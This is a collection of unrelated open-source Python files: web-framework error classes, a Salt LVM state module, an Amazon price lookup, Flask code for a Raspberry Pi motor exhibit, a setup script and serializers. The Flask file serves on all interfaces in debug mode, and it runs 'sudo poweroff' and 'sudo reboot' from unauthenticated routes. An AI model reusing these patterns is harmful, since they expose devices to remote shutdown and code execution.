super( NotAcceptable, self ).__init__( status=406, name = "Not Acceptable", descr=descr )
class RequestTimeout( HTTPException ):
"""
RequestTimeout
This must be used for the task api to indicate it should retry
"""
def __init__( self, descr="The request has timed out." ):
super( RequestTimeout, self ).__init__( status=408, name = "Request Timeout", descr=descr )
class Gone( HTTPException ):
"""
Gone
Not used inside the server
"""
def __init__( self, descr="Gone" ):
super( Gone, self ).__init__( status=410, name = "Gone", descr=descr )
class PreconditionFailed( HTTPException ):
"""
PreconditionFailed
Mostly caused by a missing/invalid securitykey.
"""
def __init__( self, descr="Precondition Failed" ):
super( PreconditionFailed, self ).__init__( status=412, name = "Precondition Failed", descr=descr )
class RequestTooLarge( HTTPException ):
"""
RequestTooLarge
Not used inside the server
"""
def __init__( self, descr="Request Too Large" ):
super( RequestTooLarge, self ).__init__( status=413, name = "Request Too Large", descr=descr )
class Censored( HTTPException ):
"""
Censored
Not used inside the server
"""
def __init__( self, descr="Unavailable For Legal Reasons" ):
super( Censored, self ).__init__( status=451, name = "Unavailable For Legal Reasons", descr=descr )
class InternalServerError( HTTPException ):
"""
InternalServerError
The catch-all error raised by the server if your code raises any python-exception not deriving from
HTTPException
"""
def __init__( self, descr="Internal Server Error" ):
super( InternalServerError, self ).__init__( status=500, name = "Internal Server Error", descr=descr )
class NotImplemented( HTTPException ):
"""
NotImplemented
Not really implemented at the moment :)
"""
def __init__( self, descr="Not Implemented" ):
super( NotImplemented, self ).__init__( status=501, name = "Not Implemented", descr=descr )
class BadGateway( HTTPException ):
"""
BadGateway
Not used
"""
def __init__( self, descr="Bad Gateway" ):
super( BadGateway, self ).__init__( status=502, name = "Bad Gateway", descr=descr )
class ServiceUnavailable( HTTPException ):
"""
ServiceUnavailable
Raised if the flag "viur.disabled" in conf.sharedConf is set
"""
def __init__( self, descr="Service Unavailable" ):
super( ServiceUnavailable, self ).__init__( status=503, name = "Service Unavailable", descr=descr )
class ReadFromClientError( object ):
"""
ReadFromClientError
Internal use only. Used as a **return-value** (its not raised!) to transport information on errors
from fromClient in bones to the surrounding skeleton class
"""
def __init__(self, errors, forceFail=False):
super( ReadFromClientError, self ).__init__()
self.errors = errors
self.forceFail = forceFail
| viur-framework/server | errors.py | Python | lgpl-3.0 | 6,008 |
# Description: Demonstrates the use of logistic regression
# Category: classification, logistic regression
# Classes: LogRegLearner
# Uses: titanic.tab
import orange
import orngLR
data = orange.ExampleTable("titanic")
lr = orngLR.LogRegLearner(data)
correct = 0
for ex in data:
if lr(ex) == ex.getclass():
correct += 1
print "Classification accuracy:", correct/len(data)
orngLR.printOUT(lr)
| yzl0083/orange | Orange/testing/regression/tests_20/modules_logreg1.py | Python | gpl-3.0 | 431 |
# -*- coding: utf-8 -*-
'''
Management of Linux logical volumes
===================================
A state module to manage LVMs
.. code-block:: yaml
/dev/sda:
lvm.pv_present
my_vg:
lvm.vg_present:
- devices: /dev/sda
lvroot:
lvm.lv_present:
- vgname: my_vg
- size: 10G
- stripes: 5
- stripesize: 8K
'''
# Import salt libs
import salt.utils
def __virtual__():
'''
Only load the module if lvm is installed
'''
if salt.utils.which('lvm'):
return 'lvm'
return False
def pv_present(name, **kwargs):
'''
Set a physical device to be used as an LVM physical volume
name
The device name to initialize.
kwargs
Any supported options to pvcreate. See
:mod:`linux_lvm <salt.modules.linux_lvm>` for more details.
'''
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
if __salt__['lvm.pvdisplay'](name):
ret['comment'] = 'Physical Volume {0} already present'.format(name)
elif __opts__['test']:
ret['comment'] = 'Physical Volume {0} is set to be created'.format(name)
ret['result'] = None
return ret
else:
changes = __salt__['lvm.pvcreate'](name, **kwargs)
if __salt__['lvm.pvdisplay'](name):
ret['comment'] = 'Created Physical Volume {0}'.format(name)
ret['changes'] = changes
else:
ret['comment'] = 'Failed to create Physical Volume {0}'.format(name)
ret['result'] = False
return ret
def pv_absent(name):
'''
Ensure that a Physical Device is not being used by lvm
name
The device name to initialize.
'''
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
if not __salt__['lvm.pvdisplay'](name):
ret['comment'] = 'Physical Volume {0} does not exist'.format(name)
elif __opts__['test']:
ret['comment'] = 'Physical Volume {0} is set to be removed'.format(name)
ret['result'] = None
return ret
else:
changes = __salt__['lvm.pvremove'](name)
if __salt__['lvm.pvdisplay'](name):
ret['comment'] = 'Failed to remove Physical Volume {0}'.format(name)
ret['result'] = False
else:
ret['comment'] = 'Removed Physical Volume {0}'.format(name)
ret['changes'] = changes
return ret
def vg_present(name, devices=None, **kwargs):
'''
Create an LVM volume group
name
The volume group name to create
devices
A list of devices that will be added to the volume group
kwargs
Any supported options to vgcreate. See
:mod:`linux_lvm <salt.modules.linux_lvm>` for more details.
'''
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
if __salt__['lvm.vgdisplay'](name):
ret['comment'] = 'Volume Group {0} already present'.format(name)
for device in devices.split(','):
pvs = __salt__['lvm.pvdisplay'](device)
if pvs and pvs.get(device, None):
if pvs[device]['Volume Group Name'] == name:
ret['comment'] = '{0}\n{1}'.format(
ret['comment'],
'{0} is part of Volume Group'.format(device))
elif pvs[device]['Volume Group Name'] == '#orphans_lvm2':
__salt__['lvm.vgextend'](name, device)
pvs = __salt__['lvm.pvdisplay'](device)
if pvs[device]['Volume Group Name'] == name:
ret['changes'].update(
{device: 'added to {0}'.format(name)})
else:
ret['comment'] = '{0}\n{1}'.format(
ret['comment'],
'{0} could not be added'.format(device))
ret['result'] = False
else:
ret['comment'] = '{0}\n{1}'.format(
ret['comment'],
'{0} is part of {0}'.format(
device, pvs[device]['Volume Group Name']))
ret['result'] = False
else:
ret['comment'] = '{0}\n{1}'.format(
ret['comment'],
'pv {0} is not present'.format(device))
ret['result'] = False
elif __opts__['test']:
ret['comment'] = 'Volume Group {0} is set to be created'.format(name)
ret['result'] = None
return ret
else:
changes = __salt__['lvm.vgcreate'](name, devices, **kwargs)
if __salt__['lvm.vgdisplay'](name):
ret['comment'] = 'Created Volume Group {0}'.format(name)
ret['changes'] = changes
else:
ret['comment'] = 'Failed to create Volume Group {0}'.format(name)
ret['result'] = False
return ret
def vg_absent(name):
'''
Remove an LVM volume group
name
The volume group to remove
'''
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
if not __salt__['lvm.vgdisplay'](name):
ret['comment'] = 'Volume Group {0} already absent'.format(name)
elif __opts__['test']:
ret['comment'] = 'Volume Group {0} is set to be removed'.format(name)
ret['result'] = None
return ret
else:
changes = __salt__['lvm.vgremove'](name)
if not __salt__['lvm.vgdisplay'](name):
ret['comment'] = 'Removed Volume Group {0}'.format(name)
ret['changes'] = changes
else:
ret['comment'] = 'Failed to remove Volume Group {0}'.format(name)
ret['result'] = False
return ret
def lv_present(name,
vgname=None,
size=None,
extents=None,
snapshot=None,
pv='',
**kwargs):
'''
Create a new logical volume
name
The name of the logical volume
vgname
The volume group name for this logical volume
size
The initial size of the logical volume
extents
The number of logical extents to allocate
snapshot
The name of the snapshot
pv
The physical volume to use
kwargs
Any supported options to lvcreate. See
:mod:`linux_lvm <salt.modules.linux_lvm>` for more details.
'''
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
_snapshot = None
if snapshot:
_snapshot = name
name = snapshot
lvpath = '/dev/{0}/{1}'.format(vgname, name)
if __salt__['lvm.lvdisplay'](lvpath):
ret['comment'] = 'Logical Volume {0} already present'.format(name)
elif __opts__['test']:
ret['comment'] = 'Logical Volume {0} is set to be created'.format(name)
ret['result'] = None
return ret
else:
changes = __salt__['lvm.lvcreate'](name,
vgname,
size=size,
extents=extents,
snapshot=_snapshot,
pv=pv,
**kwargs)
if __salt__['lvm.lvdisplay'](lvpath):
ret['comment'] = 'Created Logical Volume {0}'.format(name)
ret['changes'] = changes
else:
ret['comment'] = 'Failed to create Logical Volume {0}'.format(name)
ret['result'] = False
return ret
def lv_absent(name, vgname=None):
'''
Remove a given existing logical volume from a named existing volume group
name
The logical volume to remove
vgname
The volume group name
'''
ret = {'changes': {},
'comment': '',
'name': name,
'result': True}
lvpath = '/dev/{0}/{1}'.format(vgname, name)
if not __salt__['lvm.lvdisplay'](lvpath):
ret['comment'] = 'Logical Volume {0} already absent'.format(name)
elif __opts__['test']:
ret['comment'] = 'Logical Volume {0} is set to be removed'.format(name)
ret['result'] = None
return ret
else:
changes = __salt__['lvm.lvremove'](name, vgname)
if not __salt__['lvm.lvdisplay'](lvpath):
ret['comment'] = 'Removed Logical Volume {0}'.format(name)
ret['changes'] = changes
else:
ret['comment'] = 'Failed to remove Logical Volume {0}'.format(name)
ret['result'] = False
return ret
| CSSCorp/openstack-automation | file_root/_states/lvm.py | Python | gpl-2.0 | 8,799 |
#!/usr/bin/env python
"""This script demonstrates how the amazonproduct API can be used to look up
the price of an item.
The amazon product API is available from here:
https://bitbucket.org/basti/python-amazon-product-api/
"""
import time
import amazonproduct
api = amazonproduct.API(locale='us')
def lookup_item(keywords):
try:
items = api.item_search('All', ResponseGroup='OfferSummary, Small', Keywords=keywords)
# we'll assume it's the first - not much more we can do in an automated fashion
for item in items:
asin = item.ASIN
title = item.ItemAttributes.Title
offerSummary = item.OfferSummary
try:
lowestNewPrice = offerSummary.LowestNewPrice.FormattedPrice
except:
lowestNewPrice = None
try:
lowestUsedPrice = offerSummary.LowestUsedPrice.FormattedPrice
except:
lowestUsedPrice = None
#import pdb; pdb.set_trace()
return title.text.encode('utf-8'), asin, lowestNewPrice, lowestUsedPrice
except:
pass
return '', '', '', ''
amazon_url = "http://www.amazon.com/dp/%s"
| moshekaplan/lookup_amazon_prices | lookup_prices.py | Python | mit | 1,202 |
from flask import (Flask, render_template, request, flash)
import RPi.GPIO as GPIO
import os
import time
import threading
import thread
from threading import Thread
app = Flask(__name__)
GPIO.setmode(GPIO.BCM)
##PINS
coil_A_1_pin = 17
coil_A_2_pin = 22
coil_B_1_pin = 24
coil_B_2_pin = 23
pin_button = 18
pin_led = 21
pin_ldr = 3
GPIO.setwarnings(False)
GPIO.setup(coil_A_1_pin, GPIO.OUT)
GPIO.setup(coil_A_2_pin, GPIO.OUT)
GPIO.setup(coil_B_1_pin, GPIO.OUT)
GPIO.setup(coil_B_2_pin, GPIO.OUT)
GPIO.setup(pin_button, GPIO.IN, pull_up_down=GPIO.PUD_UP)
GPIO.setup(pin_led, GPIO.OUT)
forward_seq = ['1000', '0100','0010', '0001']
#GLOBAL VARIABLES
global end_reach
end_reach = 0
rotate_max = 3
ball_max = (512 * rotate_max)
light_on = 0
foo = 0
default_ball_delay = (2.5 / 1000.0)
work = 1
global stop_now
stop_now = 0
reverse_seq = list(forward_seq) # to copy the list
reverse_seq.reverse() #reverse for downwards
def checkLight ():
# Discharge capacitor
GPIO.setup(pin_ldr, GPIO.OUT)
GPIO.output(pin_ldr, GPIO.LOW)
measurement = 0
time.sleep(0.5)
GPIO.setup(pin_ldr, GPIO.IN)
# Count loops until voltage across
# capacitor reads high on GPO
if(GPIO.input(pin_ldr) == GPIO.LOW):
measurement = 1
return measurement
#CHECK IF BTN IS PRESSED
def checkState():
return GPIO.input(pin_button)
#TURN LED LIGHT ON / OFF
def turnLightOn():
GPIO.output(pin_led, GPIO.HIGH)
time.sleep(0.2)
def turnLightOff():
GPIO.output(pin_led, GPIO.LOW)
time.sleep(0.2)
#MOTOR MOVE FUNCTIONS
#MOVE UP
def up(delay, steps):
for i in range(steps):
if(checkState() == 0):
break
for step in reverse_seq:
if(stop_now == 1):
global stop_now
stop_now = 0
thread.exit()
GPIO.cleanup()
else:
set_step(step)
time.sleep(delay)
#MOVE DOWN
def down(delay, steps):
for i in range(steps):
if(i == (512*rotate_max)):
global end_reach
end_reach = 1
time.sleep(0.2)
for step in forward_seq:
if(stop_now == 1):
global stop_now
stop_now = 0
thread.exit()
GPIO.cleanup()
else:
set_step(step)
time.sleep(delay)
#COMBO FUNCTION: UP & DOWN (PARAMETERS ROTATIONS (512*rotations))
def move(start,rotations):
go_up = "up"
go_down = "down"
if(start==go_up):
up(default_ball_delay, (512*rotations))
elif(start==go_down):
down(default_ball_delay, (512*rotations))
##CHECK WHERE I AM
def up_or_down():
if(end_reach == 1):
time.sleep(0.2)
global end_reach
end_reach = 0
up(default_ball_delay, (600*rotate_max))
elif(checkLight() == 1):
if(checkState() == 0):
down(default_ball_delay, (512*rotate_max))
#RETURN TOP credits: Mustafa uit groep 31
def goHome():
while True:
if(checkState() == 0):
break
else:
steps = 1
up(default_ball_delay, steps)
##FUNCTIONS TO RUN MOTOR.
def run():
time.sleep(0.2)
move("up", 3)
up_or_down()
#ANIMATE THE RUN IN WHILE TRUE TO GO UNTIL LIGHT IS OFF.
def animate():
while True:
while (checkLight() == 1 and stop_now == 0): ##ALS ER LICHT IS MAG IK PAS BEWEGEN
turnLightOn()
time.sleep(4.5) ##DELAY VOOR IEDER PI OM ANIMATIE TE CREEEREN.
set_step('0000')
run()
else:
turnLightOff()
goHome()
def stop():
global stop_now
stop_now = 1
def set_step(step):
GPIO.output(coil_A_1_pin, step[0] == '1')
GPIO.output(coil_A_2_pin, step[1] == '1')
GPIO.output(coil_B_1_pin, step[2] == '1')
GPIO.output(coil_B_2_pin, step[3] == '1')
##FLASK CODE STARTS HERE EACH BUTTON REPRESENTS A PAGE.
@app.route("/")
def index():
return render_template('index.htm')
@app.route("/led_off.htm")
def led_off():
turnLightOff()
return render_template('index.htm')
@app.route("/led_on.htm")
def led_on():
turnLightOn()
return render_template('index.htm')
@app.route("/home.htm")
def go_home():
goHome()
return render_template('index.htm')
@app.route("/auto_on.htm")
def auto_on():
##turnLightOn()
global stop_now
stop_now = 0
thread.start_new_thread(animate, ())
return render_template('index.htm')
@app.route("/auto_off.htm")
def auto_off():
##turnLightOff()
stop()
return render_template('index.htm')
@app.route("/shutdown.htm")
def shutdown():
os.system("sudo poweroff")
return render_template('index.htm')
@app.route("/reboot.htm")
def reboot():
os.system("sudo reboot")
return render_template('index.htm')
@app.route("/down.htm", methods=['GET'])
def go_down():
s = (int)(request.args.get('steps'))
down(default_ball_delay, s)
return render_template('index.htm')
@app.route("/up.htm", methods=['GET'])
def go_up():
s = (int)(request.args.get('steps'))
up(default_ball_delay, s)
return render_template('index.htm')
@app.route("/xpos.htm")
def xpos():
x = open('/boot/x.txt', 'r')
for line in x:
print line
return line
@app.route("/ypos.htm")
def ypos():
y = open('/boot/y.txt', 'r')
for line in y:
print line
return line
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=True)
GPIO.cleanup() | nigh7fox/MT-MuseumBoerhaave | interface.py | Python | gpl-3.0 | 5,456 |
from setuptools import setup
setup(name='facebook_downloader',
version='0.1',
description='API wrapper and crawler to download page posts from the Facebook Graph API',
url='http://github.com/coej/facebook_downloader',
author='Chris Jenkins',
author_email='chrisoej@gmail.com',
license='MIT',
packages=['facebook_downloader'],
install_requires=[
'pymongo',
'requests',
'future',
],
# dependency_links=['http://github.com/user/repo/tarball/master#egg=package-1.0']
# for stuff not on pypi
include_package_data=True,
# use this if I want to copy over things in MANIFEST.in when installing
zip_safe=False) | coej/facebook-downloader | setup.py | Python | mit | 729 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import js2xml
import os
TEST_DIR = os.path.dirname(__file__)
files = [
os.path.join(TEST_DIR, "samples/fullcalendar.js"),
os.path.join(TEST_DIR, "samples/fullcalendar.min.js"),
os.path.join(TEST_DIR, "samples/jquery.min.js"),
]
for filename in files:
with open(filename) as f:
jscode = f.read()
tree = js2xml.parse(jscode)
| redapple/js2xml | tests/profile.py | Python | mit | 397 |
import logging
import hashlib
from pylons import request, response, session, tmpl_context as c
from pylons.controllers.util import abort, redirect_to, etag_cache
from pylons.decorators import jsonify
from pylons.i18n.translation import _
from wurdig.lib.base import BaseController, render
log = logging.getLogger(__name__)
class JsController(BaseController):
@jsonify
def _json(self):
translations = {
'Are you positive you want to do that?': _('Are you positive '
'you want to do that?'),
'The item has successfully been deleted.': _('The item has '
'successfully been deleted.'),
'Disapprove': _('Disapprove'),
'The item has successfully been approved.': _('The item has '
'successfully been approved.'),
'Approve': _('Approve'),
'The item has successfully been disapproved.': _('The item has successfully '
'been disapproved.'),
'Your+request+has+been+completed+successfully': _('Your+request+has+been+'
'completed+successfully'),
'An unexpected error has occurred.': _('An unexpected error has occurred.'),
'Enter key word(s)': _('Enter key word(s)')
}
return translations
def translations(self):
json_string = "if(!this.WURDIG) {var WURDIG = {};}WURDIG.translate = %s" % self._json()
etag_cache(key=hashlib.md5(json_string).hexdigest())
response.content_type = 'application/x-javascript; charset=utf-8'
response.cache_control = 'max-age=2592000'
response.pragma = ''
return json_string | leveille/blog.v1 | wurdig/controllers/js.py | Python | mit | 1,892 |
from rest_framework import serializers
from recipemaster.recipes.models import Recipe, Tag
class TagSerializer(serializers.ModelSerializer):
class Meta:
model = Tag
fields = ('title', 'slug', 'color')
class RecipeSerializer(serializers.ModelSerializer):
tags = TagSerializer(many=True, read_only=True)
class Meta:
model = Recipe
fields = ('title', 'url', 'tags')
| agnethesoraa/recipemaster | recipemaster/recipes/serializers.py | Python | mit | 413 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.